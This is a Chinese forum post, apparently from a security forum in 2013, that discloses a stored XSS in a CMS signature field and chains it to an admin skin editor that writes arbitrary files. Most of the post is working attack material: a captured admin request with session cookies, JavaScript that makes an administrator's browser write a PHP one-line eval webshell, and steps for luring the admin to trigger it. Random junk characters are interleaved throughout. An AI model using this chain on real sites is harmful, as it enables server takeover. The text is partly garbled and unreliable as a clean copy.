|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
. ^5 w% e3 {; v+ Q8 H/ T. S7 J官网已经修补了,所以重新下了源码
5 }- W2 b) c$ y* e因为 后台登入 还需要认证码 所以 注入就没看了。
' s/ Z9 t; c4 W存在 xss
# |& d7 ~4 I' O* G# Y漏洞文件 user/member/skin_edit.php
+ `( ?! v5 R, I# j本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
# L5 l. Z! C8 o7 k+ Z$ X! t% ^ + b5 _. V' L- Y4 G$ h7 B& z
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>$ q* H3 F& z% y4 F; ]2 ?7 B/ N6 V, x
6 s! p* p. M& l/ [
</textarea></td></tr>- _+ o: T' k, N
& `3 g7 R j0 G2 f5 g user/do.php 4 }0 K7 o9 M& G/ Q
2 r; w+ F |2 f% O/ x4 c- x( w/ u0 F& J7 s
if($op=='zl'){ //资料0 x0 a: q8 F) d* o; t
1 R! H' J X, u, v" H( Y if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
. u& ~ V( [; q exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
: ^! _- ?0 M9 l' K# W5 I 8 R( x$ ]9 O A
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
0 d" ]2 u% p. H" k 1 y% z. e' ~' D* `- k
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
4 R0 S1 d: q/ E where CS_Name='".$cscms_name."'";
; c- o; N; j: I1 ^! ]( S & U- T' C. m+ H# T! E
if($db->query($sql)){; j0 O0 N' n3 Y2 n
- H. G( s4 y/ L0 b* L% X
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));& @. a6 k' _8 {7 i0 |1 _
7 ?/ a5 J+ s+ I
}else{. M3 S9 S( t( n* ~6 Y6 w* X0 f0 O
' V" W* \8 ~4 g! d3 W5 t7 h exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));+ k8 p o0 B1 c- R, T
4 V4 w$ A9 W% w1 a
}
! H! L W: q& k) ?) N; E4 q3 O/ ^1 h! Y! h
4 Y* m( z) _: n: {( M
没有 过滤导致xss产生。0 f" H4 I6 O# t# ?: z4 S. J
后台 看了下 很奇葩的是可以写任意格式文件。。5 H: q0 u) D& U
抓包。。7 ?% u9 T1 A0 ?; P1 v7 Z2 V- M2 ^
3 D! i. ?3 x) y, q9 N" J) N' W
( q7 }7 _% g6 I本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1( g% D) v7 M: l: p1 K/ f
' G5 O# l& O# z) `4 R" NAccept: text/html, application/xhtml+xml, */*
3 O/ T r( W: P! d/ u) I ! \. b) N7 P( ^4 B3 X8 w
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
, ^& T# }) ?5 {, d$ R
: ?! ^$ e; c5 |* ]$ vAccept-Language: zh-CN. ^9 J+ x6 Y. R- k
0 E. W, _ M7 VUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)6 V$ N9 g5 H! V
7 P3 [) L4 D! m1 j! N9 {( `
Content-Type: application/x-www-form-urlencoded
$ u. A/ H( b& p" O4 a ( p; }/ a! H' J4 o+ ^& V2 G
Accept-Encoding: gzip, deflate
, x' S! j3 k4 Q; x2 C/ |6 P: k$ K - {# q8 W. l6 p, T
Host: 127.0.0.1
! B/ `: @; j! h" {' L: S
; p/ p" l, b6 ?9 Z6 V" @7 uContent-Length: 38
3 m" `- z' G$ G
E0 O& X/ g+ W7 rDNT: 1' E1 p; Q# d/ Z& n8 r2 ]0 p, |, h
7 A/ Q( G6 w$ s/ r: Y1 @
Connection: Keep-Alive
m7 r; U( a/ j$ O4 Z# F
$ e: S1 o: Y1 O1 J9 ZCache-Control: no-cache
- i' ?8 m' ~# P # n& a3 o7 ?6 i% B
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594& D) ~( ~; H. n! H) ^! {
, o4 O2 E2 C! C
- A! [1 j4 F8 n$ z
name=aaa.php&content=%3Cs%3E%3Ca%25%3E; f a, \: e1 V4 F4 l) o7 \
: P# y* F4 R* x+ ?
+ |3 K$ J1 f" I
9 _ R+ E; v! V6 [于是 构造js如下。 c' y! C0 Q. ^
1 Q. r$ ]- c; G: J本帖隐藏的内容<script>
2 r- O: G0 _$ ?, I. n% @- a7 cthisTHost = top.location.hostname;
$ `0 y0 \# P& C0 T! e
) u) D( y" Z. V0 l# vthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
; ~6 y" @/ l; l: ? 2 S" E+ X A9 e# O+ q! d% E4 }
function PostSubmit(url, data, msg) {
' V, G& Y- K% @9 j) j" T, D0 k var postUrl = url;4 d( `# \8 R- l* U+ C/ C+ d5 A# t
5 Z* O I$ _' o! |0 d) e( ~
var postData = data;
/ c& ~5 x" @. x. k; g; D var msgData = msg; 6 ]7 a: Z& b* }$ J* ]
var ExportForm = document.createElement("FORM"); 5 Y4 M {6 ]8 Z+ ] T0 Y: L
document.body.appendChild(ExportForm);
- U9 {% V$ g( c1 p. t ExportForm.method = "POST";
) o" m6 E, O) z! v: b* i var newElement = document.createElement("input");
/ O9 k) y# ]" F$ V Y* Q) ]- K newElement.setAttribute("name", "name");
9 F4 j" Q5 _3 \7 m newElement.setAttribute("type", "hidden");
2 O2 n7 h0 c4 ?, z% a% \8 }7 u var newElement2 = document.createElement("input");
% x9 ?% B3 I( Z; G- @5 l newElement2.setAttribute("name", "content");
( L Z6 l# X6 Q* V m& a3 G6 s9 l newElement2.setAttribute("type", "hidden");
5 n* X4 Z$ G" R# K# k5 L! c ExportForm.appendChild(newElement); ! s5 K/ l8 u7 m4 r. _- f" Y3 N
ExportForm.appendChild(newElement2); 7 b {- V" L5 U
newElement.value = postData;
# u2 d6 [+ y! Q5 D3 F. c newElement2.value = msgData;
a; ]2 h" E" B! @4 _* \) ` ExportForm.action = postUrl; ; m6 J7 H2 {; ]8 f$ ?* a' x
ExportForm.submit(); 1 H. I1 k( t) D* V# y
};
( }. b- Z4 h; m! g8 I a
5 F! W' j- J% S. ^( z; oPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
, L; B8 }6 l) d4 y ' H9 I5 Z8 I8 c* X% ], e
</script>8 G; `: \2 y, l5 _. e' l+ x l
0 D9 y4 y& P1 F5 x1 m$ {, e3 ]
4 k$ p' ]& \/ R" B
' d) N2 s# M* k& @6 I
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入# a; ]! ~$ C/ A D& e% i/ d
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)$ c; M, Z" o* E, z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
0 ]% u5 I+ L1 t |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对